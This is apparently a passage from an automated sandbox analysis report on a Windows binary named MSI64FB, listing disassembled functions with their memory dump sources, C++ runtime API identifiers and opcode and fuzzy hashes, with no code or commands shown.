                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: f81326ee9d92757cd56833d181037053bdd52f514750a2f53ce31003b409b3cc
                                                                                                                                                                                                                                                    • Instruction ID: f8cb4ede17f8895e5f7461e6f390b672a92f571d0018b394a18630d97855c798
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81326ee9d92757cd56833d181037053bdd52f514750a2f53ce31003b409b3cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE518F2290CA86C5EB92FF2694503BDFBB19B85B44FD48072D69C173C6CF2DA456C362
                                                                                                                                                                                                                                                    Function 00007FF749F46690 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Free$AllocConcurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4037287460-0
                                                                                                                                                                                                                                                    • Opcode ID: e644cd8ea09a4508aa4ced8792a3a2c06cc0b0e59cf1b23194b986bca74f8d05
                                                                                                                                                                                                                                                    • Instruction ID: f2fcd89046f5ff636335d20f016b6846f46957b6ccd18a179ccfa20a951741df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e644cd8ea09a4508aa4ced8792a3a2c06cc0b0e59cf1b23194b986bca74f8d05
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1451AE66708B86C2EB18BF65D1446A9A360FB58BE4F948635DB6D177C0CF3CE4A18710
                                                                                                                                                                                                                                                    Function 00007FF749F4ABD0 Relevance: 9.1, APIs: 6, Instructions: 132memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1577144837-0
                                                                                                                                                                                                                                                    • Opcode ID: 002792494f8d74684d2c5423764b666f5d3601d0c9efcc69f0908dc1352b7959
                                                                                                                                                                                                                                                    • Instruction ID: 37ac963c86d578ad8bbcb9df237cd832e5e2d927b8b110180aff44f56d747271
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 002792494f8d74684d2c5423764b666f5d3601d0c9efcc69f0908dc1352b7959
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56417C72648A41C1EB04AF25E5446ADA7B5FB58BD0FA48635EBAD07BD8DE3CD091C310
                                                                                                                                                                                                                                                    Function 00007FF749F71B9C Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: e4f0fcc02155ab2045ba3d1d05d20b990752452ab997ddad45090bebc877272c
                                                                                                                                                                                                                                                    • Instruction ID: 1a651e8f67f3bee2c6df567e1f2c33f75dce9ed47f57162a65e57734bb06eba3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4f0fcc02155ab2045ba3d1d05d20b990752452ab997ddad45090bebc877272c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF419E22B0CA42D1EB09BF55E4945B8A371EB84BA0FC84532EA5D477E6DF3CE445C320
                                                                                                                                                                                                                                                    Function 00007FF749F618E4 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 901851fa2b833e1742f365ec31cf967296e1508a00f7142b07edae039649f84d
                                                                                                                                                                                                                                                    • Instruction ID: 086a11b7fa75c38b2f8af365be09fa36be48f0cc4beaa19bdc585d6219af96ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901851fa2b833e1742f365ec31cf967296e1508a00f7142b07edae039649f84d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13418222B0CA46C1EB15BF26D4405B9E371EF45BA4F981532DA5D476E6DE6CE842C320
                                                                                                                                                                                                                                                    Function 00007FF749F55CF0 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 51d212c152bdcff1e4d21c0728e2fcb4c36014acc0634747f696d28f05a69bc3
                                                                                                                                                                                                                                                    • Instruction ID: bf5e54dc0d89f4b7acda5b06a726523120f2f1c96406d8e0f2a28763cb9b1c10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51d212c152bdcff1e4d21c0728e2fcb4c36014acc0634747f696d28f05a69bc3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B318023A1CA46D1EB19BF55D4840B9E371EB94BB0F9A0132DA0D076E6DE6CF582C320
                                                                                                                                                                                                                                                    Function 00007FF749F4CBB0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 8d2c100bf9d2e0600e1ef22c7a39249ddffb1c26514391e28490c7320da19440
                                                                                                                                                                                                                                                    • Instruction ID: fdb219131d5c9d798b987e1a37d87b9dd18e93c58afdb21759a2a982bf714653
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d2c100bf9d2e0600e1ef22c7a39249ddffb1c26514391e28490c7320da19440
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00318222A8CA82D1EB09BF55E4405B9E371FB64BA4F881231DA4D477D5EF7CE442C320
                                                                                                                                                                                                                                                    Function 00007FF749F55BD8 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 006285de0621515d359ce12fc345f66d1627c98e70f5238c8fa960e55dcfbf37
                                                                                                                                                                                                                                                    • Instruction ID: bdf1ca29ba6135901cc90351eef1d136b33e7eb354e6c6c6d9db63ab3250bb78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 006285de0621515d359ce12fc345f66d1627c98e70f5238c8fa960e55dcfbf37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16318062A0CA46D1EB09BF65E4441B8E371EB54BB4F8A0231DA1D477E6DE7CF542C320
                                                                                                                                                                                                                                                    Function 00007FF749F7196C Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: b4f9e0c4c4a88189330b8026f74b10148109776af48481e52f8805c03750c11c
                                                                                                                                                                                                                                                    • Instruction ID: beb0f9f3bc65a833981cdbb508a137f35e0d4e82dc696d61aec0a8dcd2549fa1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4f9e0c4c4a88189330b8026f74b10148109776af48481e52f8805c03750c11c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B318122B0DA42D1FB09BF55E4845B8E371EB54BB0F980271EA4D476E5DE7CE586C320
                                                                                                                                                                                                                                                    Function 00007FF749F559A8 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: ff08806b4226c0067b6b0812c526be4dac25bd622191c0632b052790350db230
                                                                                                                                                                                                                                                    • Instruction ID: 4c04dcab7e18e57ab6703ecac34706ce7bb91badb7d013014522318e226f5430
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff08806b4226c0067b6b0812c526be4dac25bd622191c0632b052790350db230
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1318222A1DA46D1EB09BF55E4801B8E371EB55BB4F8A0131DA0D476E6DE7CF542C320
                                                                                                                                                                                                                                                    Function 00007FF749F71A84 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 8dbff8bf7bcca8e6b7daddbe81a1f843d72d1fc32ee4c2ed7e84790663cf9c26
                                                                                                                                                                                                                                                    • Instruction ID: 7bf43d3e5f8a28d658f49d88036cc7f429b365365d0b6432473c619d73d246fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbff8bf7bcca8e6b7daddbe81a1f843d72d1fc32ee4c2ed7e84790663cf9c26
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E31A222B0CA42C5FB09BF59E4805B9E371EB54BA4FD80231EA1D076E5EE7CE446C360
                                                                                                                                                                                                                                                    Function 00007FF749F55AC0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 1cd675cdae4b30848f1e2c8f88ee6aecfb470c339a9554a1e8ee825deec7a2ae
                                                                                                                                                                                                                                                    • Instruction ID: 98a44b2545ef430989df363914f555ee7cd358daf5fb78f50703489c4e7f9b7d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cd675cdae4b30848f1e2c8f88ee6aecfb470c339a9554a1e8ee825deec7a2ae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2318022A0DA42E1EB09BF55E4841B9E371EB54BB0F8A0131DA0D477E6DE7CF582C320
                                                                                                                                                                                                                                                    Function 00007FF749F4EF90 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: efc4ad35715c7b093dfe8a3a3559126c191ffa8df0383cec2e75ab23a145a574
                                                                                                                                                                                                                                                    • Instruction ID: 1cdea4ec821051dc5a004046e03a6171718de661f9dc146e50575ce1ea7e19c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efc4ad35715c7b093dfe8a3a3559126c191ffa8df0383cec2e75ab23a145a574
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2317022A8CA42D1EB05BF59E8406B9E371FB94BA4F880531DE5D476E5DF7CE482C320
                                                                                                                                                                                                                                                    Function 00007FF749F61024 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 4ed889266c8f34ac9296bc9a39efd0163183bdd0f2669738bf207ae140b1644a
                                                                                                                                                                                                                                                    • Instruction ID: 7709dbd866f1a8f1731709392e40412acbbe1a7ddda5f6908fce25d440dce12a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ed889266c8f34ac9296bc9a39efd0163183bdd0f2669738bf207ae140b1644a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69316F26B0CB86D1EB19BF55E4445B9E371EB54BA0F880631DA0D477D5DE7CE842C320
